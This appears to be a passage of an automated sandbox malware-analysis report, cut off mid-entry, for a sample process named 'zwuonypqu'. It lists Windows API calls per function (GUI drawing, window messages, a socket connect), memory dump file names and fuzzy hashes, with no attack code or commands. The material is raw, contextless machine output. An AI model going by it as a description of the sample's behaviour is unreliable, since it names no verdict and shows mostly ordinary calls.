                        APIs
                        • GetClientRect.USER32(?,?,004A83D8,?), ref: 00447997
                        • GetCursorPos.USER32(?), ref: 004479A2
                        • ScreenToClient.USER32(?,?), ref: 004479BE
                        • WindowFromPoint.USER32 ref: 004479FF
                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Client$CursorFromPointProcRectScreenWindow
                        • String ID:
                        • API String ID: 1822080540-0
                        • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                        • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                        • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                        • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00447C1B
                        • ScreenToClient.USER32(?,?), ref: 00447C39
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                        • EndPaint.USER32(?,?), ref: 00447CD1
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                        • String ID:
                        • API String ID: 659298297-0
                        • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                        • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                        • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                        • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                        APIs
                        • GetCursorPos.USER32(?), ref: 004478A7
                        • TrackPopupMenuEx.USER32 ref: 004478C3
                        • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                        • GetCursorPos.USER32(?), ref: 00447935
                        • TrackPopupMenuEx.USER32 ref: 0044795B
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CursorMenuPopupTrack$Proc
                        • String ID:
                        • API String ID: 1300944170-0
                        • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                        • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                        • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                        • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                        APIs
                        • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                        • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                        • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                          • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                          • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                          • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                          • Part of subcall function 004413F0: SendMessageW.USER32(0243E158,000000F1,00000000,00000000), ref: 004414C6
                          • Part of subcall function 004413F0: SendMessageW.USER32(0243E158,000000F1,00000001,00000000), ref: 004414F1
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$EnableMessageSend$LongShow
                        • String ID:
                        • API String ID: 142311417-0
                        • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                        • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                        • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                        • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                        APIs
                        • _memset.LIBCMT ref: 0044955A
                          • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                        • _wcslen.LIBCMT ref: 004495C1
                        • _wcslen.LIBCMT ref: 004495CE
                        • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend_wcslen$_memset_wcspbrk
                        • String ID:
                        • API String ID: 1843234404-0
                        • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                        • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                        • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                        • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                        • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                        • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                        • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                        APIs
                        • IsWindowVisible.USER32(?), ref: 00445721
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                        • _wcslen.LIBCMT ref: 004457A3
                        • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                        • String ID:
                        • API String ID: 3087257052-0
                        • Opcode ID: 83f4a4f7e1307f697503a55fab5912a7e6cccdcd4c8552ef17fe2b9e988a211b
                        • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                        • Opcode Fuzzy Hash: 83f4a4f7e1307f697503a55fab5912a7e6cccdcd4c8552ef17fe2b9e988a211b
                        • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                        APIs
                        • IsWindow.USER32(00000000), ref: 00459DEF
                        • GetForegroundWindow.USER32 ref: 00459E07
                        • GetDC.USER32(00000000), ref: 00459E44
                        • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                        • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$ForegroundPixelRelease
                        • String ID:
                        • API String ID: 4156661090-0
                        • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                        • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                        • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                        • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                        APIs
                          • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                        • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                        • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                        • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                        • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                        • String ID:
                        • API String ID: 245547762-0
                        • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                        • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                        • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                        • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 00447151
                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                        • SelectObject.GDI32(?,00000000), ref: 004471A2
                        • BeginPath.GDI32(?), ref: 004471B7
                        • SelectObject.GDI32(?,00000000), ref: 004471DC
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Object$Select$BeginCreateDeletePath
                        • String ID:
                        • API String ID: 2338827641-0
                        • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                        • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                        • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                        • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                        APIs
                        • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                        • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CounterPerformanceQuerySleep
                        • String ID:
                        • API String ID: 2875609808-0
                        • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                        • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                        • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                        • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                        APIs
                        • SendMessageW.USER32 ref: 0046FD00
                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                        • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                        • DestroyIcon.USER32(?), ref: 0046FD58
                        • DestroyIcon.USER32(?), ref: 0046FD5F
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyIcon
                        • String ID:
                        • API String ID: 3419509030-0
                        • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                        • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                        • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                        • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                        APIs
                        • __getptd.LIBCMT ref: 004175AE
                          • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                          • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                        • __amsg_exit.LIBCMT ref: 004175CE
                        • __lock.LIBCMT ref: 004175DE
                        • InterlockedDecrement.KERNEL32(?,0048C9D8,0000000C,00411498,00000000,?,004114D4,?,00000000), ref: 004175FB
                        • InterlockedIncrement.KERNEL32(02562C60,0048C9D8,0000000C,00411498,00000000,?,004114D4,?,00000000), ref: 00417626
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                        • String ID:
                        • API String ID: 4271482742-0
                        • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                        • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                        • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                        • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Destroy$DeleteObjectWindow$Icon
                        • String ID:
                        • API String ID: 4023252218-0
                        • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                        • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                        • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                        • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 00460342
                        • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                        • MessageBeep.USER32(00000000), ref: 0046036D
                        • KillTimer.USER32 ref: 00460392
                        • EndDialog.USER32 ref: 004603AB
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                        • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                        • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                        • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                        APIs
                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                        • DeleteObject.GDI32(?), ref: 0045564E
                        • DeleteObject.GDI32(?), ref: 0045565C
                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                        • DestroyWindow.USER32 ref: 00455678
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                        • String ID:
                        • API String ID: 1489400265-0
                        • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                        • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                        • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                        • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                        APIs
                          • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                        • DestroyWindow.USER32 ref: 00455640
                        • DeleteObject.GDI32(?), ref: 0045564E
                        • DeleteObject.GDI32(?), ref: 0045565C
                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                        • DestroyWindow.USER32 ref: 00455678
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                        • String ID:
                        • API String ID: 1042038666-0
                        • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                        • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                        • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                        • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
